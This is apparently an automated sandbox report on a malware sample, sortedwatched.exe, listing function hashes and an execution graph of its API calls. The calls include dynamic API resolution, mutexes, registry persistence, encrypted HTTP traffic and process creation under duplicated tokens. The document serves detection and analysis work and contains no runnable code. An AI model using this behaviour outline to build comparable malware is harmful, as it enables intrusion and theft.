                  • Instruction Fuzzy Hash: 1F023A7090066EEFCB16CF68C9946FBBB71FF85300F14016AC65587742DB3AA961CB98
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 004F50E8, Relevance: 1.7, Strings: 1, Instructions: 416UNIQUE
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.327369163.004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_4f0000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: y`O
                  • API String ID: 0-671071595
                  • Opcode ID: 3df911d3bb229b9e5b5053eb572e8c057e61aac1366dbd8753bf5e6acc202186
                  • Instruction ID: b5033d37423fdc029bebee0373c8021ff9f615142b27f38c3b4236c5330b9541
                  • Opcode Fuzzy Hash: 3df911d3bb229b9e5b5053eb572e8c057e61aac1366dbd8753bf5e6acc202186
                  • Instruction Fuzzy Hash: F8022230901F148FC775CA29C680667B7F1BF557217604A2EC6E786E91D63AF846CF18
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 004F50E4, Relevance: 1.5, Strings: 1, Instructions: 239UNIQUE
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.327369163.004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_4f0000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: y`O
                  • API String ID: 0-671071595
                  • Opcode ID: b96cb0e65caae956d89309612aba2b1de07e8c44b9477945874e0032d935268f
                  • Instruction ID: 0687d7f38934386887cda74d468b2bbcfbca42572012cae3167bff190d6d1ba6
                  • Opcode Fuzzy Hash: b96cb0e65caae956d89309612aba2b1de07e8c44b9477945874e0032d935268f
                  • Instruction Fuzzy Hash: A8A11330901F588FC735CA29C684667B7F1BF55720B504A2ED6E786A91E639F882CF08
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 005B2970, Relevance: .1, Instructions: 92COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000000B.00000002.327417458.005B1000.00000020.00000001.sdmp, Offset: 005B1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_5b1000_sortedwatched.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                  • Instruction ID: c46f16a9a50fa8f94cf99254912accfd0168f35c7da64798b3803371bfc4d910
                  • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                  • Instruction Fuzzy Hash: 1841B371D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB50
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 004F22AF, Relevance: .1, Instructions: 92COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000000B.00000002.327369163.004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_4f0000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                  • Instruction ID: fa096d4b28396d82548ad37cb5301d341d960d6cb6b0acd2e6e9667d2d6df94e
                  • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                  • Instruction Fuzzy Hash: 3641C471D1051CDBCF48CFADC991AAEBBF2AF88201F548299D516AB345D734AB41DB80
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 004F0467, Relevance: .1, Instructions: 80COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000000B.00000002.327369163.004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_4f0000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
                  • Instruction ID: 21b4a94f0dd54da6a8920e93c934c4b81594e4ec8c553df878800d79dc9fbab9
                  • Opcode Fuzzy Hash: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
                  • Instruction Fuzzy Hash: 8831A03660434A8FC710DF18D480A3AB7E4FFC9304F4509AEEA9587313D338E9068B95
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 003F0E18, Relevance: .1, Instructions: 61COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000000B.00000002.327239879.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_3f0000_sortedwatched.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                  • Instruction ID: bc2578dd6b9fb0db097aa24992b2759d24e7c00210767aa3fcb160d93c6bba02
                  • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                  • Instruction Fuzzy Hash: 131170B23405049FDB54DF59DCC1EB673EAEB98320B298455EE04CB312D675E801C760
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 005B2860, Relevance: .0, Instructions: 35COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000000B.00000002.327417458.005B1000.00000020.00000001.sdmp, Offset: 005B1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_5b1000_sortedwatched.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 35fae48b58514328602f79420b2e81abbf1084ebf9a99db8433c1080f312f74a
                  • Instruction ID: 88b12265e0f97bd506323b75d0c80854e6ffab2cd54da8538b0ee176a25cf618
                  • Opcode Fuzzy Hash: 35fae48b58514328602f79420b2e81abbf1084ebf9a99db8433c1080f312f74a
                  • Instruction Fuzzy Hash: 18019674E10209EFCB44DF98C5909ADFBB5FF48310F208599E809A7741D730AE41DB90
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 005B2800, Relevance: .0, Instructions: 35COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000000B.00000002.327417458.005B1000.00000020.00000001.sdmp, Offset: 005B1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_5b1000_sortedwatched.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2bcb60f536e0ace9363e1095d119401d239975132a0b2009284b610fb2bfc0a9
                  • Instruction ID: 080466b7ce11205fd0c1150200f8cfcc7cb4620d857c52f85ea8bca6d9544f28
                  • Opcode Fuzzy Hash: 2bcb60f536e0ace9363e1095d119401d239975132a0b2009284b610fb2bfc0a9
                  • Instruction Fuzzy Hash: A3014278E15209EFCB48DF98C5909AEFBB5FF48310F208599E919A7741E730AE41DB90
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 004F213F, Relevance: .0, Instructions: 35COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000000B.00000002.327369163.004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_4f0000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2bcb60f536e0ace9363e1095d119401d239975132a0b2009284b610fb2bfc0a9
                  • Instruction ID: eefdbca49389732c69f4301433ce8881c5a27b7bf8ecc352be77181b50bf1d46
                  • Opcode Fuzzy Hash: 2bcb60f536e0ace9363e1095d119401d239975132a0b2009284b610fb2bfc0a9
                  • Instruction Fuzzy Hash: EF019278E00109EFCB44DF98C6909AEFBB5FF48310F20859AEA09A7705D734AE41DB84
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 004F219F, Relevance: .0, Instructions: 35COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000000B.00000002.327369163.004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_4f0000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 35fae48b58514328602f79420b2e81abbf1084ebf9a99db8433c1080f312f74a
                  • Instruction ID: 9ee4ff09e5e1e9da669886e532b9ffa98b567d39afc7ca1fc3c36245cc508a04
                  • Opcode Fuzzy Hash: 35fae48b58514328602f79420b2e81abbf1084ebf9a99db8433c1080f312f74a
                  • Instruction Fuzzy Hash: E0019278A00109EFCB44DF98C6909AEF7B5FB48310F20859AEA19A7705D734AE51DB84
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 004F2C0C, Relevance: .0, Instructions: 23COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000000B.00000002.327369163.004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_4f0000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8ad48bf59bba2d8cda96442d10b01183ac7760b7c19d3faa8316632ce25345ad
                  • Instruction ID: 47c269dfc356fa0adcfaa00abfba0985b52ac68e63f2ea8be2e03d2a5b21d21f
                  • Opcode Fuzzy Hash: 8ad48bf59bba2d8cda96442d10b01183ac7760b7c19d3faa8316632ce25345ad
                  • Instruction Fuzzy Hash: 59E04F327104988BC631DA95968097AF3A5EB847B0329086BD64693601C2A8BC019644
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 004F3743, Relevance: .0, Instructions: 3COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000000B.00000002.327369163.004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_4f0000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 98b478bd1af69a2275d0ab39f1ac079ffe73a0c4551ec61df12d917ad4ecd62f
                  • Instruction ID: dd1ea78877d89c8c1f21003391c56dd86dd10fe21c56db2a52adb93900471d7c
                  • Opcode Fuzzy Hash: 98b478bd1af69a2275d0ab39f1ac079ffe73a0c4551ec61df12d917ad4ecd62f
                  • Instruction Fuzzy Hash: 8EA00275752980CFCE12CB09C394F9073F4F744B41F0504F1E80997A11C238A900CA00
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Analysis Process: sortedwatched.exe PID: 3780 Parent PID: 3672 sortedwatched.exeUNIQUE

                  Execution Graph

                  Execution Coverage:34.7%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:13.3%
                  Total number of Nodes:513
                  Total number of Limit Nodes:8

                  Graph

                  execution_graph 2793 40f072 2810 40cace 2793->2810 2798 40f0a8 2820 401a52 2798->2820 2800 40f0b9 2801 40f0d5 GetCommandLineW lstrlenW lstrlenW 2800->2801 2802 40f119 2801->2802 2803 40f120 2802->2803 2804 40f0fa lstrcmpiW 2802->2804 2834 401cc2 2803->2834 2804->2802 2805 40f10c 2804->2805 2824 40c84e GetTickCount 2805->2824 2839 4012cd GetPEB 2810->2839 2812 40db70 2841 4012ff 2812->2841 2814 40db7d 2815 40db84 2814->2815 2816 4012cd GetPEB 2815->2816 2817 40f05e 2816->2817 2818 4012ff 2 API calls 2817->2818 2819 40f06b GetModuleFileNameW 2818->2819 2819->2798 2821 401a70 2820->2821 2859 4014f2 GetProcessHeap 2821->2859 2823 401a84 2823->2800 2823->2823 2861 40c493 GetWindowsDirectoryW 2824->2861 2829 40c8a5 ExitProcess 2830 40c875 WaitForSingleObject 2831 40c88f 2830->2831 2831->2829 2879 40c78f 2831->2879 2833 40c894 WaitForSingleObject 2833->2831 2835 401503 memset 2834->2835 2836 401cd9 2835->2836 2837 401d03 ExitProcess 2836->2837 2838 401d0f CloseHandle CloseHandle 2836->2838 2838->2837 2840 4012e2 2839->2840 2840->2812 2842 401306 2841->2842 2843 401224 2841->2843 2842->2814 2844 4012c3 2843->2844 2845 4012a7 2843->2845 2844->2814 2847 401192 2845->2847 2848 4011a3 2847->2848 2849 4012cd GetPEB 2848->2849 2850 4011f3 2849->2850 2851 4011f7 LoadLibraryW 2850->2851 2852 401208 2850->2852 2851->2852 2854 40121a 2851->2854 2855 401224 2852->2855 2854->2843 2856 401260 2855->2856 2857 4012c3 2855->2857 2856->2857 2858 401192 2 API calls 2856->2858 2857->2854 2858->2856 2860 401502 2859->2860 2860->2823 2862 40c4f1 2861->2862 2863 40c4b2 GetVolumeInformationW 2861->2863 2865 40c601 2862->2865 2863->2862 2909 40c4f5 2865->2909 2867 40c609 2868 40c60d WaitForSingleObject 2867->2868 2870 40c67d 2867->2870 2869 40c624 2868->2869 2869->2870 2913 40c54e 2869->2913 2870->2829 2870->2830 2872 40c62d 2873 40c665 ReleaseMutex CloseHandle 2872->2873 2917 40c5a7 2872->2917 2873->2870 2875 40c636 2875->2873 2876 40c63a SignalObjectAndWait 2875->2876 2877 40c653 2876->2877 2878 40c657 ResetEvent 2876->2878 2877->2873 2877->2878 2878->2873 2880 40c79a 2879->2880 2881 40c80f 2879->2881 2882 40c7c9 2880->2882 2883 40c79d 2880->2883 2990 40632a 2881->2990 2955 408922 2882->2955 2885 40c7a0 2883->2885 2886 40c7b8 2883->2886 2889 40c7a7 SetEvent 2885->2889 2890 40c840 2885->2890 2921 40c682 GetTickCount 2886->2921 2889->2890 2890->2833 2900 40c822 2902 40c82c GetTickCount 2900->2902 2902->2833 2908 40c7e9 2908->2890 2908->2900 2908->2902 2910 401a52 GetProcessHeap 2909->2910 2911 40c50e 2910->2911 2912 40c52d CreateMutexW 2911->2912 2912->2867 2914 401a52 GetProcessHeap 2913->2914 2915 40c567 2914->2915 2916 40c586 CreateMutexW 2915->2916 2916->2872 2918 401a52 GetProcessHeap 2917->2918 2919 40c5c0 2918->2919 2920 40c5df CreateEventW 2919->2920 2920->2875 3026 40fa9b 2921->3026 2923 40c6a3 lstrlen 3027 402398 RtlGetVersion GetNativeSystemInfo 2923->3027 2925 40c6b9 3028 401e04 GetPEB 2925->3028 2927 40c6c1 3029 4022d2 2927->3029 2933 40c6e7 2934 40c778 2933->2934 3052 406104 2933->3052 3079 401532 GetProcessHeap HeapFree 2934->3079 2937 40c780 3080 401532 GetProcessHeap HeapFree 2937->3080 2940 40c702 2944 40c715 2940->2944 3081 40f9df 2940->3081 2941 40c759 GetTickCount 3108 406297 2941->3108 2943 40c788 2943->2833 3089 40c9a3 2944->3089 2946 40c757 3109 401532 GetProcessHeap HeapFree 2946->3109 2950 40c720 2952 40c73e 2950->2952 2954 40c74d 2950->2954 3092 40f99a 2950->3092 2952->2954 3099 40fd40 2952->3099 3107 401532 GetProcessHeap HeapFree 2954->3107 2956 401a52 GetProcessHeap 2955->2956 2957 408c9b LoadLibraryW 2956->2957 2958 408cb0 2957->2958 2959 4012ff 2 API calls 2958->2959 2960 408ccd 2959->2960 2961 408cd5 2960->2961 2962 401a52 GetProcessHeap 2961->2962 2963 409bc0 LoadLibraryW 2962->2963 2964 409bd5 2963->2964 2965 4012ff 2 API calls 2964->2965 2966 409bf5 2965->2966 2967 409bfd 2966->2967 2968 401a52 GetProcessHeap 2967->2968 2969 40a28c LoadLibraryW 2968->2969 2970 40a2a1 2969->2970 2971 4012ff 2 API calls 2970->2971 2972 40a2c1 2971->2972 2973 40a2c9 2972->2973 2974 401a52 GetProcessHeap 2973->2974 2975 40b678 LoadLibraryW 2974->2975 2976 40b68d 2975->2976 2977 4012ff 2 API calls 2976->2977 2978 40b6ad 2977->2978 2979 40b6b5 2978->2979 2980 401a52 GetProcessHeap 2979->2980 2981 40c456 LoadLibraryW 2980->2981 2982 40c46b 2981->2982 2983 4012ff 2 API calls 2982->2983 2984 40c48b 2983->2984 2985 4060c5 2984->2985 2986 406101 2985->2986 2987 4060e9 2985->2987 2986->2908 2987->2987 3412 401ffc 2987->3412 2989 4060ff 2989->2908 2991 401a52 GetProcessHeap 2990->2991 2992 407689 LoadLibraryW 2991->2992 2993 40769e 2992->2993 2994 4012ff 2 API calls 2993->2994 2995 4076be 2994->2995 2996 4076c6 2995->2996 2997 401a52 GetProcessHeap 2996->2997 2998 4088e5 LoadLibraryW 2997->2998 2999 4088fa 2998->2999 3000 4012ff 2 API calls 2999->3000 3001 40891a 3000->3001 3002 40f92d 3001->3002 3428 40f16b OpenSCManagerW 3002->3428 3006 40f942 3434 40f26c 3006->3434 3008 40f947 3009 40f292 GetProcessHeap memset SHGetFolderPathW SHGetFolderPathW 3008->3009 3010 40f94c 3009->3010 3011 40f3c5 8 API calls 3010->3011 3012 40f951 3011->3012 3013 40f43e GetProcessHeap GetComputerNameW WideCharToMultiByte _snprintf 3012->3013 3014 40f956 3013->3014 3015 40f2ee GetProcessHeap lstrlenW SHGetFolderPathW SHGetFolderPathW DeleteFileW 3014->3015 3016 40f95b lstrcmpiW 3015->3016 3017 40f970 3016->3017 3018 40f972 3016->3018 3017->2908 3019 40f63a 10 API calls 3018->3019 3020 40f977 3019->3020 3021 40f980 3020->3021 3022 40f987 3020->3022 3023 40f7a0 24 API calls 3021->3023 3024 401cc2 memset CloseHandle CloseHandle 3022->3024 3025 40f985 3023->3025 3024->3025 3025->2908 3026->2923 3027->2925 3028->2927 3110 401943 CreateToolhelp32Snapshot 3029->3110 3032 402318 3033 4014f2 GetProcessHeap 3032->3033 3035 402328 3033->3035 3034 402305 lstrlenW 3034->3032 3034->3034 3036 402376 3035->3036 3038 402334 lstrcpyW lstrlenW 3035->3038 3039 40235c 3035->3039 3037 40238a 3036->3037 3124 401532 GetProcessHeap HeapFree 3036->3124 3044 40fcf6 3037->3044 3038->3035 3117 402424 WideCharToMultiByte 3039->3117 3045 40fd08 3044->3045 3046 4014f2 GetProcessHeap 3045->3046 3047 40c6dc 3045->3047 3046->3047 3048 40c901 3047->3048 3049 40c913 3048->3049 3050 4014f2 GetProcessHeap 3049->3050 3051 40c91d 3050->3051 3051->2933 3135 405e88 3052->3135 3055 406279 3055->2940 3055->2941 3057 406157 3058 406272 3057->3058 3147 40207b 3057->3147 3228 401532 GetProcessHeap HeapFree 3058->3228 3063 401a52 GetProcessHeap 3064 406183 3063->3064 3163 405fa4 3064->3163 3070 406267 3227 401532 GetProcessHeap HeapFree 3070->3227 3071 406254 3226 401532 GetProcessHeap HeapFree 3071->3226 3074 40624c 3225 401532 GetProcessHeap HeapFree 3074->3225 3076 406241 3224 401532 GetProcessHeap HeapFree 3076->3224 3079->2937 3080->2943 3082 40fa87 3081->3082 3083 40f9f5 3081->3083 3082->2944 3084 401a52 GetProcessHeap 3083->3084 3085 40fa09 3084->3085 3085->3082 3086 401a52 GetProcessHeap 3085->3086 3087 40fa3f RegCreateKeyExW 3086->3087 3087->3082 3088 40fa5e RegSetValueExW RegCloseKey 3087->3088 3088->3082 3090 401503 memset 3089->3090 3091 40c9b9 3090->3091 3091->2950 3342 40f883 lstrcpyW lstrlenW GetTickCount 3092->3342 3097 40f9d9 3097->2952 3098 401cc2 3 API calls 3098->3097 3104 40fd52 3099->3104 3101 40fdb7 3101->2954 3102 4014f2 GetProcessHeap 3102->3104 3104->3101 3104->3102 3350 40fc1d 3104->3350 3355 40fb72 3104->3355 3369 40fb2f 3104->3369 3376 40caa6 3104->3376 3107->2946 3108->2946 3109->2934 3111 401961 Process32FirstW 3110->3111 3112 4019a5 3110->3112 3113 401989 3111->3113 3112->3032 3112->3034 3114 40199e CloseHandle 3113->3114 3116 40197b Process32NextW 3113->3116 3125 402255 3113->3125 3114->3112 3116->3113 3118 40244a 3117->3118 3122 402367 3117->3122 3119 4014f2 GetProcessHeap 3118->3119 3120 402451 3119->3120 3121 402457 WideCharToMultiByte 3120->3121 3120->3122 3121->3122 3123 401532 GetProcessHeap HeapFree 3122->3123 3123->3036 3124->3036 3126 40226b 3125->3126 3127 402273 GetCurrentProcessId 3126->3127 3128 4022c8 3126->3128 3127->3128 3129 40227e 3127->3129 3128->3113 3129->3128 3130 402284 GetCurrentProcessId 3129->3130 3130->3128 3131 40228f 3130->3131 3131->3128 3132 4014f2 GetProcessHeap 3131->3132 3133 4022a9 3132->3133 3133->3128 3134 4022af lstrcpyW 3133->3134 3134->3128 3136 405e9c 3135->3136 3137 4014f2 GetProcessHeap 3136->3137 3138 405ea8 3137->3138 3139 405ec8 3138->3139 3229 4027a7 3138->3229 3139->3055 3143 4062d8 3139->3143 3144 4062ea 3143->3144 3145 4014f2 GetProcessHeap 3144->3145 3146 4062f4 3145->3146 3146->3057 3148 402094 3147->3148 3149 4014f2 GetProcessHeap 3148->3149 3150 4020ad 3149->3150 3151 40214a 3150->3151 3152 4020ba CryptDuplicateHash 3150->3152 3151->3063 3151->3070 3153 402143 3152->3153 3154 4020d6 3152->3154 3289 401532 GetProcessHeap HeapFree 3153->3289 3156 4020e6 CryptEncrypt 3154->3156 3157 402136 CryptDestroyHash 3156->3157 3158 402107 3156->3158 3157->3151 3157->3153 3286 401f11 CryptExportKey 3158->3286 3162 40212d 3162->3157 3290 401503 3163->3290 3166 401a52 GetProcessHeap 3167 405fce 3166->3167 3293 405f15 lstrlenW GetTickCount 3167->3293 3169 405fd9 3170 401a52 GetProcessHeap 3169->3170 3171 405fef 3170->3171 3172 4014f2 GetProcessHeap 3171->3172 3173 40602a 3172->3173 3174 406033 3173->3174 3175 4060a8 3173->3175 3176 40603e GetTickCount 3174->3176 3175->3071 3183 40140a 3175->3183 3177 40605a 3176->3177 3178 4014f2 GetProcessHeap 3177->3178 3179 406064 3178->3179 3182 406079 3179->3182 3295 401e27 GetTickCount 3179->3295 3297 401532 GetProcessHeap HeapFree 3182->3297 3299 401345 ObtainUserAgentString 3183->3299 3186 4014e2 3313 401532 GetProcessHeap HeapFree 3186->3313 3187 40143a InternetConnectW 3188 401458 3187->3188 3189 4014d9 InternetCloseHandle 3187->3189 3191 401a52 GetProcessHeap 3188->3191 3189->3186 3193 401467 3191->3193 3192 4014e9 3192->3071 3205 40215a 3192->3205 3194 40146f HttpOpenRequestW 3193->3194 3195 40148f 3194->3195 3196 401493 HttpSendRequestW 3195->3196 3197 4014cd InternetCloseHandle 3195->3197 3198 4014c6 InternetCloseHandle 3196->3198 3199 4014a9 3196->3199 3197->3189 3198->3197 3303 401316 HttpQueryInfoW 3199->3303 3201 4014b3 3201->3198 3202 4014ba 3201->3202 3304 401383 3202->3304 3206 40217a 3205->3206 3215 402173 3205->3215 3207 4014f2 GetProcessHeap 3206->3207 3206->3215 3208 40219e 3207->3208 3209 4021a8 CryptDuplicateHash 3208->3209 3208->3215 3210 4021c8 3209->3210 3216 402223 3209->3216 3211 4021d6 CryptDecrypt 3210->3211 3213 402216 CryptDestroyHash 3211->3213 3214 4021f6 CryptVerifySignatureW 3211->3214 3213->3215 3213->3216 3214->3213 3215->3074 3215->3076 3217 405ed3 3215->3217 3322 401532 GetProcessHeap HeapFree 3216->3322 3218 4014f2 GetProcessHeap 3217->3218 3219 405eea 3218->3219 3220 405f0a 3219->3220 3323 402a73 memset 3219->3323 3220->3076 3222 405efd 3222->3220 3327 401532 GetProcessHeap HeapFree 3222->3327 3224->3074 3225->3071 3226->3070 3227->3058 3228->3055 3233 402727 memset 3229->3233 3231 4027b6 3231->3139 3232 401532 GetProcessHeap HeapFree 3231->3232 3232->3139 3234 402759 3233->3234 3238 402752 3233->3238 3239 402594 3234->3239 3238->3231 3246 4025a0 3239->3246 3241 40259c 3241->3238 3242 402629 3241->3242 3243 40263c 3242->3243 3245 402653 3242->3245 3243->3245 3259 4047dd 3243->3259 3245->3238 3247 4025aa 3246->3247 3250 4025b9 3247->3250 3252 402561 GetProcessHeap 3247->3252 3250->3241 3253 40257b 3252->3253 3253->3250 3254 40499d 3253->3254 3255 404a03 3254->3255 3256 4049ed memset 3254->3256 3257 404a87 memset 3255->3257 3258 404a9d memset memset 3255->3258 3256->3255 3257->3258 3258->3250 3260 4047ee 3259->3260 3262 404808 3259->3262 3260->3243 3261 4048f4 3274 40436d 3261->3274 3262->3260 3262->3261 3264 4048e1 3262->3264 3270 403e46 3264->3270 3266 4048e8 3266->3260 3278 4037a9 3266->3278 3269 404952 memset memset 3269->3260 3272 403e86 3270->3272 3271 404271 3271->3266 3272->3271 3273 4037a9 8 API calls 3272->3273 3273->3272 3276 404395 3274->3276 3275 40473a 3275->3266 3276->3275 3277 4037a9 8 API calls 3276->3277 3277->3275 3279 4037c7 3278->3279 3281 40378e 6 API calls 3279->3281 3282 4038ff 3279->3282 3280 40392e memset memset 3285 403bd4 3280->3285 3281->3282 3282->3280 3283 40378e 6 API calls 3282->3283 3283->3280 3285->3260 3285->3269 3287 401f39 3286->3287 3287->3157 3288 401f56 CryptGetHashParam 3287->3288 3288->3162 3289->3151 3298 40150b memset 3290->3298 3292 401509 3292->3166 3294 405f3d 3293->3294 3294->3169 3296 401e44 3295->3296 3296->3182 3297->3175 3298->3292 3300 40136c 3299->3300 3302 401379 InternetOpenW 3299->3302 3314 4023e5 MultiByteToWideChar 3300->3314 3302->3186 3302->3187 3303->3201 3320 401316 HttpQueryInfoW 3304->3320 3306 40139b 3307 4013e7 3306->3307 3308 4014f2 GetProcessHeap 3306->3308 3307->3198 3309 4013b0 3308->3309 3309->3307 3310 4013e9 3309->3310 3311 4013bd InternetReadFile 3309->3311 3321 401532 GetProcessHeap HeapFree 3310->3321 3311->3309 3311->3310 3313->3192 3315 402401 3314->3315 3316 40241e 3314->3316 3317 4014f2 GetProcessHeap 3315->3317 3316->3302 3318 402409 3317->3318 3318->3316 3319 40240f MultiByteToWideChar 3318->3319 3319->3316 3320->3306 3321->3307 3322->3215 3324 402aa5 3323->3324 3326 402a9e 3323->3326 3324->3326 3328 40284f 3324->3328 3326->3222 3327->3220 3329 402865 3328->3329 3333 40289b 3328->3333 3330 4028af 3329->3330 3329->3333 3334 402917 3329->3334 3335 404ad4 3330->3335 3332 404ad4 6 API calls 3332->3334 3333->3326 3334->3332 3334->3333 3341 404b19 _memset 3335->3341 3336 404e76 memset 3336->3341 3337 404e04 memset 3337->3341 3338 404f66 memset memset memset 3338->3341 3339 404bd9 3339->3333 3339->3339 3340 40533d memset 3340->3341 3341->3336 3341->3337 3341->3338 3341->3339 3341->3340 3348 401e8f GetTickCount 3342->3348 3344 40f8bd 3345 40f8e6 CreateFileW 3344->3345 3346 40f926 3345->3346 3347 40f90d WriteFile CloseHandle 3345->3347 3346->3097 3346->3098 3347->3346 3349 401eb0 3348->3349 3349->3344 3380 401855 3350->3380 3352 40fc5c 3352->3104 3353 40fc2d 3353->3352 3354 40fc43 CreateThread 3353->3354 3354->3352 3393 40fb06 3354->3393 3395 40faa1 SHGetFolderPathW lstrlenW GetTickCount 3355->3395 3358 40f8e6 3 API calls 3359 40fb9d 3358->3359 3360 40fc18 3359->3360 3398 401dcb WTSGetActiveConsoleSessionId 3359->3398 3360->3104 3363 401a52 GetProcessHeap 3364 40fbbd 3363->3364 3402 401d2b 3364->3402 3366 40fbf6 3367 40fbfd CloseHandle CloseHandle 3366->3367 3368 40fc0f CloseHandle 3366->3368 3367->3368 3368->3360 3370 40faa1 4 API calls 3369->3370 3371 40fb46 3370->3371 3372 40f8e6 3 API calls 3371->3372 3373 40fb56 3372->3373 3374 40fb6c 3373->3374 3375 401cc2 3 API calls 3373->3375 3374->3104 3375->3374 3377 40cab7 3376->3377 3379 40cac5 3377->3379 3409 40ca23 3377->3409 3379->3104 3381 401866 3380->3381 3382 401873 VirtualAlloc 3381->3382 3383 401922 3381->3383 3382->3383 3384 401890 3382->3384 3383->3353 3388 40179c 3384->3388 3387 401913 VirtualFree 3387->3383 3389 401819 3388->3389 3391 4017b0 3388->3391 3389->3383 3389->3387 3390 4017be LoadLibraryA 3390->3389 3390->3391 3391->3389 3391->3390 3392 4017ea GetProcAddress 3391->3392 3392->3389 3392->3391 3394 40fb17 3393->3394 3396 401e8f GetTickCount 3395->3396 3397 40fadd 3396->3397 3397->3358 3399 401de3 3398->3399 3400 401de7 DuplicateToken CloseHandle 3399->3400 3401 401dfc 3399->3401 3400->3401 3401->3360 3401->3363 3403 401503 memset 3402->3403 3404 401d48 3403->3404 3405 401a52 GetProcessHeap 3404->3405 3408 401d9b 3404->3408 3406 401d61 3405->3406 3407 401d74 CreateProcessAsUserW 3406->3407 3406->3408 3407->3408 3408->3366 3410 401503 memset 3409->3410 3411 40ca39 3410->3411 3411->3379 3413 401503 memset 3412->3413 3414 402009 3413->3414 3423 401f75 CryptAcquireContextW 3414->3423 3417 402014 CryptGenKey 3419 402030 CryptCreateHash 3417->3419 3420 40205e CryptDestroyKey CryptReleaseContext 3417->3420 3418 402078 3418->2989 3421 402052 CryptDestroyKey 3419->3421 3422 40204e 3419->3422 3420->3418 3421->3420 3422->2989 3424 401ff3 3423->3424 3425 401f98 CryptDecodeObjectEx 3423->3425 3424->3417 3424->3418 3426 401fe6 CryptReleaseContext 3425->3426 3427 401fbe CryptImportKey LocalFree 3425->3427 3426->3424 3427->3424 3427->3426 3429 40f17e 